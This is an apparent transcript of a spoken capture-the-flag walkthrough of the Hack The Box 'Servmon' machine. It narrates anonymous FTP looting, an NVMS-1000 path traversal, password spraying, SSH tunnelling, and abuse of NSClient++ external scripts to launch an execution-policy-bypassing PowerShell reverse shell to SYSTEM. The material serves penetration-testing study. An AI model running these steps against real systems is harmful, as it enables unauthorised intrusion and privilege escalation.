Hello, I'm NoxLumens. Today I'm going to be doing Servmon. Why am I doing Servmon? I'm doing Servmon because it's a part of TJ Nulls list, his updated list for the OSCP, and I believe I'm going to be taking that. It looks like it's already up and running, so I'm going to clear that out, knock that down, and then we're going to start with our rest scan like we normally do. Yes, so our IP is 10.129.227.77. And coming back. Okay, so we have a lot of ports open. While it's running the script scans or the default scripts and version enumeration, we're gonna go ahead and check out this port. We're gonna check out 80 as soon as I write this down. Cool. Let's go check this out. Actually, what I have this on my clipboard, don't I? All right, we should be better now. Come on, page. Ooh, additionally, while this is running, we can also do Go Buster. We can run Go Buster. Do some directory busting. And let that go. It is. I was gonna say it's taking a long time, but it's probably taking a long time because I'm like hammering it with information. Not information, but uh, running so much against it with the MS scan and trying to access it. What is this? This equals root script login JSV. We could do something like C. Go back. Buster found nothing. Server returns status code that matches. Oh. Continue. Please exclude the status code or length, which I think is it exclude? It's probably just exclude length 118. Yeah, exclude length 118. Still surprised. Like nothing is coming back. Let's see if the scan finished. It did. Okay. Let's do some stuff. Grab all of this mess, all these ports and all this port information. And pop it in here. I'm actually going to make a new note. Call it nmap. I'm going to see what makes it look the nicest. Okay, well that's nice and colorful. Let's see. Oh, I need to close that tab. And a new tab. FTP is open. B10 129 227 77. User logged in. Users. Nadine and Nathan. Okay. So FTP found, or FTP has anonymous login enabled, and we located 2 users. Copy, paste, and Nadine, Nathan. Let's look in here. If we can. Holy crap, we can. And cat stuff. Cat confidential. More confidential.txt. Yes, okay. Who was that? That was Nadine. Nadine has confidential.txt file and Nadine share. It contains this message to Nathan. File transfer warning. 6-bear line feed received. ASCII Nadine. I left your password.txt file on your desktop. Please remove this once you edit it yourself and place it back in your secure folder. Love that. Of course, that's how we do things around here. We always. What is it not like? My spelling. Maybe it doesn't like the .txt. There's Nadine's, and then let's look at Nathan. Back. Is it back? Is it it's like that? Yeah. CD Nathan LS. Nope. CD Nathan. Trying to move too fast. More notes to do .txt. I cannot find the file. Is that because I don't know how to do it? It is. Lock down the upload, the password, remove. Okay. Let's copy this out and actually read through it, because what I did just then was pretend to read through it for your benefit, and it is actually not going to benefit either of us. The system cannot find the path. This, yeah, let's just move that right out of there. Notes on to do. Change the password for NVMS. Complete. Lock down the NSClient access. Got it. Upload the passwords. Remove public access to NVMS. And place the secret files in SharePoint. Okay. Anything else here, Nathan? Okay. Let's hop back over. See what else we've got. We know we have 2 users. We can go back to 80, the web server. Let's see what's going on. We could try something netexec, SSH, nope, SMB, 10.129.227.77 for, we can try Nathan, and password of user share, wordless, rock you. Will that work? Is that gonna work? Oof. Do not decode password file. Ignore password decoding. You can ignore UTF-8 characters. Okay. Kind of. Oh man. Can I not have like? Can you not show me output, please? Yeah. Do not retrieve command output. No output. Let's see what that does. Not what I wanted it to do. There's something else on here. No, right check, skip right check on shares. Dump user targets. Continue on success, no brute force. I do want to brute force. I guess I want to continue on success. I don't want any of this freaking output. I guess it'll just stop if it finds something. All right. We'll let that run. For Nathan, his account, if they have a lockout policy, he is locked out for days. NVMS 1000, NVMS 1000. Let's look up exploits. And we see a directory traversal. Kind of lines up with like what I was going to do here. Is that we see like JS with the V equals. Where's it going to? Literally just a bunch of slashes. Moving up directories. Where's it checking? Is it just like the base config here? Like this? Windows win.ini. Is that what they were? Oh shit. Oh shit. No. Let me go back and see what our. Yeah, that's nothing's happening there. I was wanted to look at GoBuster, but doesn't look like it found anything. Directory list. T users. How's it finding nothing? So odd. Word list, Buster. What are we looking at? The medium list. 4118 80. Imagine it's the login. Nathan. Nadine. Happens if we choose another language. Nothing. We just look at pages. What if we do that? vms.py. Another directory traversal. A lot of directory traversal. Unique pile. And they all seem. This is like the same thing. Is it encoding it in some way? IP/return URL. Is it? This has a slash and it's also adding a slash to the first character. Okay. Let's just. That's not working. We're going to go ahead and download this and then give it a shot. Not that though. This one. I'm going to say that's not coming back with anything, and we will go to up, and then Servmon, make dir dub, and cd2 dub. Python 3, vms.py. We need a 10, 129, 227, 77. And we want, I don't know how to do, I'm not sure. Okay, Windows, Win.I, and I'm just literally just gonna keep it the way that they had it. Did it actually grab it? So what happens if we do users, yeah, users, Nathan, desktop. What do they call the file? Change the password, uploaded the, passwords.txt. Desktop, passwords.txt, and then we'll call it passwords, lowercase, .text. Oh. Oh, okay. So I wonder if it's like the, stop it, stop all that. I wonder if it's the user agent, or specifically what it is in this that is allowing it to work. I got rid of it, didn't I? I think it was this one. This. Let's look at their request. 1, reversal. 2, we're setting the header, setting a custom user agent. We're setting the accept to */ refer is the site, and then content equal to 2. And maybe if I come back later, or I feel like it will come back later and check this out. So post is vulnerable to path traversal. And it was a CVE, wasn't it? No. Yeah. Here it is. Awful lucky lucky for us that they put all that information on their FTP server that allows anonymous login. Okay. Let's get these into actually at passwords. Yeah, right. So that means we can do SMB. No, we can do exactly what we were doing earlier. Netexec, SMB 10, 129, 227, 77. Tag U, Nathan, tag P, passwords.text. Nope. What about Nadine? Okay. Oh. All right, Nadine. I'm sorry. Big sucks for you. Okay, cool. And we used netexec to password spray, netexec password spray, found credentials, and we were able to locate Servmon, Nadine, and then like big butts at work. I think that's what that says. Like big butts at work. You'll have to correct me in the comments. If you made it this far in, go ahead and just comment like big butts at work, just so I know. Just you know, just so I know. RM. Guess I didn't actually see if it was vulnerable. Here's what we can do here. Maybe. Let's see if we can log in now that we have some credentials. Maybe there's more information inside. Nadine, okay, never mind. SMB map. 10, 129, 227, 77. My clipboard. Like big butts at work, me too. No, I don't. That was a horrible joke. Nadine. Here we go. What is this? Oh, default share. So not a whole lot. What about EP Nadine at 10, 129, 227, 77. Hopefully I still have her password in my clipboard. Copy pasta. I'm in. Okay, there we go. Users. Oh, same thing. Yeah. Okay, that was worth a shot. Let's see what else we've got running. High Windows ports. NSClient. NSClient plus plus. NSClient plus plus. 8443. Well, Napster. Let's go check 8443 out. 8443. Okay. What other ports? 8022. SSH. Nadine at 10, 129, 227, 77. I'm so sure. And here's her password. Okay. So now we SSH'd onto the box. SSH Nadine at 10, 129, 227, 77. With password, I like big butts at work. And a dir because we're on Windows desktop. Sure. We've got the user's flag. Type user.text. User flag. Cool. What else? Net. Let's see if that 8 what was it? Was it 8443? Look at that. Netstat, TAC, ANO. net stat attack ANO. Listening 21, 22, 134, 566. Was that in our scan previously? Also, actually, I'm sure that it probably was 566. But yeah, it was. Okay. Let's do this instead. Let's SSH. Yeah. Let me get my stuff pulled up for that. SSH proxy. Now that we know that we can get in, exit. Let's see. So we'll listen on port 8443 over localhost 8443. And I think that is it. All right, we just need to put our butt password and let's see. I'm gonna need to do 127.0.0.1. Actually, let's exit out of this. Let's give up on that. And we'll just see what we can find on, where did it go? Wasn't it here? Net plus plus or something? Page login. Napster, here it is. NSClient plus plus. We can reach the internal network. I mean, we are on it. Oh shit, I think I just copied that. I did. Let's forget this. Grab this back. Let's do some looking around. Copy pasta. We have nothing. Let's go a hunting. CD. What is rec data? Rec data. CD rec data dir. CD recorded info. db.db3. Let me see. Oh, SQLite. Arm rec info primary key. Let's do net user. Nathan net group. Net groups. Net local group. Authenticator, power users. Get backup operators, admins, CD shared. Imagine this is the FTP users. Sure, it is. About users, just random users folder. CD. Can I access? Administrator. CD nadir. Oh, because I'm in freaking users. Oh my god. Of course I can. Dir. CD inet hub. Oh. Access is denied. Okay. What about CD program files? And we do see this. Let's look this up. Let's see if anything exists for it. Exploit. Privilege escalation. Exactly what we need to do is escalate privileges. When NSClient++ is installed with web server, enable low-level privilege users have the ability to read the web administrator's password in clear text from the config file. Okay. Let's check that out real fast. Grab program files, the CD, NSClient, type bro, client ++, type NSClient.ini. So then we should see some credentials in here. And we do. Undocumented key. Go, yeah, whatever. Enumeration. We were able to located NS client ++ folder, config file, configuration file with credentials. There they are. Along with a way to, I found this whole exploit chain, actually. What is it even doing? Let's log in and enable following modules, including enable at startup and save config, download netcat, and evil.bat to the temp directory. Is it literally, it's just telling us to do these things. Restart the computer and wait for the reverse shell. I cannot do that. What if instead, so what's his face changed the password. So let's check this out real fast. Net exec smb 10 129 227 77 tac u. Oh, I'm about to type in Ronnie. Nathan tac p. Yikes. Tac p what? Tac p. That password at. Dirty little password sharers. Okay. That's worth a shot. Worth a shot. Add scripting. Wait. Documented key. What about okay, well, let's just follow this for a second. I thought maybe those would work. Yeah, there's that, there's that. These were in this path. Current password so secret. I love that. NSCP. .exe web dash password dash display. Is password supposed to be the password? Oh, wait, what? It just pulls out password. Okay. Log in and enable following modules. How do I log in? Thing is, even if we can't restart the computer, but maybe we can restart, I don't know, the service? A service? CD this, dir, CD, no temp, make dir, temp, dir, CD do temp. What else can we do? CD can do something like this. CD opt, solo, proxy, self-cert, solo, CD, opt, ligolo. Actually, we need Windows, D, Python 3, agent.exe, go all the way down to temp, CD temp, and we get, oh, we had a curl, didn't we? Curl HTTP, and 10.14.118 agent.exe. Ooh. Hack-o agent.exe. Yeah, it might take a little bit. I need to pull up notes on ligolo. Let's see. Because we have to do a little bit of setup. Or, like, did it get it? It did, okay. So to build the tunnel with here, call it ton ligolo. We have to build the interface, whatever. We've already started the proxy server. Now need to start agent. Need to make it 10.10.14. I am 118. Connect to us. Get our callback. You can see our session. We'll select the session. And then I think it's as easy as saying start. Oh. One of the most important things. So the ligolo uses a special port number for localhost. So if you need to set up, like, set it so that you can access the localhost on the victim machine, this is how you do it. Sudo IP route add 240.0.0.1/32 dev ligolo. So now we should be able to access it. There's a Metasploit module. Let's try this. Metasploit module. See what happens. Also, can I still access this? Okay, I seem to be able to. Was this it? Okay. Options. Set our host to 10, 129, 227, 77. Set set L host to ton 0. What else do we need? Set password to this. And ooh, I may need to change the R host. Yeah. To 240.0.0.1. Is R port an option? Is the R port an option? Shit. It is. Oof. Is this gonna work? Run. Oh. Target's vulnerable. We knew that. Added external script name pry wiley beesist. Reloading the application somehow magically. And it's taking its sweet time. Yeah. Triggering payload. Come on, baby. Big money. Oof. Unfortunate that this is not working. Let's see what else. Let's see what's in here. Oh shit, did I kill my tunnel? I can't tell. No, I didn't kill the tunnel. Here we go. What does this say? Where does it go? Was it this one? Okay. We need a bat file. Let's fuck it. Exit out of that shit. Clear it off. SSH. Medina at 129, 227, 77. And her password was like big butts at work. Nadine, that's your password. Oh. There we go. Much better. All right, let's cd do c tempter. Okay, so we've got a couple things in here. I guess I never ended up getting netcat on here. So let's try do that. Python 3 d desktop curl http what 10 10 14 118 netcat.exe to netcat.exe sure, and there it is. We can netcat.exe 10 10 14 118 netcat mvlp 9001 back. That actually might just work. Let's see. Not recognized as an internal command. C temp. Not recognized as an internal command, internal or external command. We're in it, right? Like, sure. It's getting, something's getting rid of it. Okay. The file contains a virus or pup. So we need to bypass antivirus. What about like a PowerShell or reverse shell? Can try. Let's test.ps1 out to test.ps1. See how long this lasts. Help me. Okay. Let's go back. Settings, scripts. Let's see. Add a new script. Scripts. Settings. External. Oh, these are settings. External scripts. PowerShell. E. PowerShell. Value. And desktop PS1. And then we'll save it. Even though it should have already been saved. queries. Reload, restarting. Please wait while we restart. Exploit 1.bat. What is the fuck is exploit 1.bat? Check external scripts. Queries. Can't tell if it's working. Okay, so apparently I crashed the box. It's gonna be half a second for you, but I'm going to go to bed because I need to restart the box and it's late, and I don't want to have to get back to where I was. So anyway, I will see you in half a second. All right, team. I'm here to tell you this took significantly longer than it needed to. Okay. So let's kind of start from the top. So I've just gotten back in, and the way this works, the way the exploit works, because I had to do testing before I tried live again because it was just taking way too long. Anyway, let me show you what I have here. Type test.ps1. Actually, you can see type test.bat. Cat test.bat. Okay, so I have a PowerShell file that is a reverse shell. Okay, I called it test.ps1. You can see it down here. You can see the contents of test.ps1 here. We've got the proxy running, and then you can also see a bat file, which I don't have on here yet. Do I? Oh, okay, I do. There it is. Okay, so yeah, create the bat file. Here's how we have to do it. So execution, so you can't run scripts by default. We have to bypass the execution policy. So we needed a way to both bypass the execution policy and then run a file. So here's how we're doing it. In the bat file, we're saying PowerShell.exe, so start PowerShell execution policy bypass. You could do PowerShell.exe -EP bypass, same thing. Windows style, hidden, non-interactive, so we're not getting any kind of pop-ups that tell us to accept. No logo, and then file ctemp test.ps1. Here it is right here. You have to have the full path. We're in ctemp, and we're going to run test.ps1. From there, once we've logged in, we're on settings. We're opening in settings, external scripts, and then from here we would create a new one. At this section, you're gonna call it whatever you want. I called mine PowerShell. Yikes. For no reason, PowerShell. The key, command, and then the value is the location. Temp test.ps1. All right, and then you're going to add it. Then it's going to appear down here, where you'll see it. So here's the key value, right? And then there's the command that it's going to execute. Once you have this and you've saved it, you're going to click Control, because remember, we have to restart the service. We can't do that. I couldn't do that. So we can restart the whole thing, right? So Control, reload. It's going to reload the service for us, and then we're going to click on Queries. From Queries, we'll go to PowerShell, and then we can run the task on our own. So instead of creating a scheduled task, which I believe is what this, yes. Yeah, this mentions creating a scheduled task that checks every minute and runs a command. We're not going to do it that way. We're going to run, or from the Queries tab, the PowerShell script that we just had, we're going to run the PowerShell command, which, if you know, it was ctemp test.bat. If we have a netcat listener running, so let's clear this out, netcat NLVP, you can already see that it tried to run the script. So if we run this, we get a call back. If we say, who am I? We're NT authority system, okay? Oh, man. Wow. That was rough. That was really rough. It doesn't seem rough, but it took a lot of finagling, a lot of messing around. True.text. Awesome, epic. Whew. There we go. All right, team. Good job. You did fantastic. You did fantastic. You can do this as well. If you have questions, put them in the comment section down below. I will see you later. Have a good day.